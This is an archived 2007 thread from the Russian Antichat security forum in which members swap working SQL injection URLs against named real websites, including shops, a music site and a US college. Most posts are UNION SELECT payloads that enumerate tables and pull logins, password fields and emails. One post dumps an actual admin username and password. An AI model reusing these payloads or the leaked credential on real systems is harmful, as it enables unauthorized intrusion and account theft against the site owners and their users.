HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.09.2007, 19:38
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

sbornikmp3.ru
Код:
http://www.sbornikmp3.ru/details.php?album=58869+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15+--+
Прошелся по названием таблиц из соседней темы, не одной таблицы не подобрал
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

Oracle.
  #2  
Старый 05.09.2007, 20:36
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Oracle.

www.bmcc.cuny.edu

Версия:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,banner,1+from+v$version--&dep=
CORE 10.1.0.3.0 Production
NLSRTL Version 10.1.0.3.0 - Production
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
TNS for Linux: Version 10.1.0.3.0 - Production

Таблицы:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,table_name,1+from+sys.all_tables--&dep=
интересная USERS

Столбцы:

Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,column_name,1+from+sys.all_tab_columns--&dep=
username, password

Вытаскиваем:
Код:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,concat(username,concat(chr(59),password)),1+from+users--&dep=
admin;lrc_01
 
Ответить с цитированием

  #3  
Старый 06.09.2007, 01:18
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,table_name,4,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+20,1/*
 
Ответить с цитированием

  #4  
Старый 06.09.2007, 12:36
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429

Репутация: 728
По умолчанию

Интернет-магазин парфюмерии Zemen :/
Цитата:
http://www.zemen.ru/product_info.php?product s_id=-1546+union+ select+1/*
 
Ответить с цитированием

  #5  
Старый 06.09.2007, 15:46
SWAT
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753

Репутация: 552
По умолчанию

Код:
http://www.ascon.ru/order.php?id=-11+union+select+1,2,table_name,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*
хостинг:
Код:
http://www.officinaweb.com/hosting.php?id=-5+union+select+1,2,3,4/*

Последний раз редактировалось SWAT; 06.09.2007 в 16:33..
 
Ответить с цитированием

  #6  
Старый 06.09.2007, 17:44
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

sharelita.com
4.1.21-standard:testnkel_onkel@localhost
Код:
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #7  
Старый 07.09.2007, 00:53
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Цитата:
Сообщение от l-l00K  
sharelita.com
4.1.21-standard:testnkel_onkel@localhost
Код:
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),password,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+users+--+
На этом сайте уже обнаружена инекция
http://forum.antichat.ru/showthread.php?p=438529#post438529

ты просто нашёл на таком же файле,просто с больше количеством таблиц
 
Ответить с цитированием

  #8  
Старый 07.09.2007, 14:19
MegaBits
Участник форума
Регистрация: 30.08.2006
Сообщений: 181
Провел на форуме:
1058786

Репутация: 45
По умолчанию

Код:
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.user/*
 
Ответить с цитированием

  #9  
Старый 07.09.2007, 20:15
fobofob
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
Провел на форуме:
1373642

Репутация: 569
По умолчанию

новости шоубизнеса

кому интересно копаем

код:
http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,version(),4,5,6,7+from+showb iz/*

[B]5.0.27-log
 
Ответить с цитированием

  #10  
Старый 08.09.2007, 00:10
1NtR0
Участник форума
Регистрация: 14.04.2007
Сообщений: 197
Провел на форуме:
1122391

Репутация: 209
По умолчанию

Код:
http://www.umzug.cn/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
Код:
http://online-geldverdienen24.de/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
Код:
http://links.1a-chat.com/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
Код:
http://www.kaufguenstigerein.de/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*
Код:
http://www.eliste.eu/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,passwort,null,null,null,null,null/**/from/**/wls_eintrag/*

Последний раз редактировалось 1NtR0; 08.09.2007 в 00:17..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.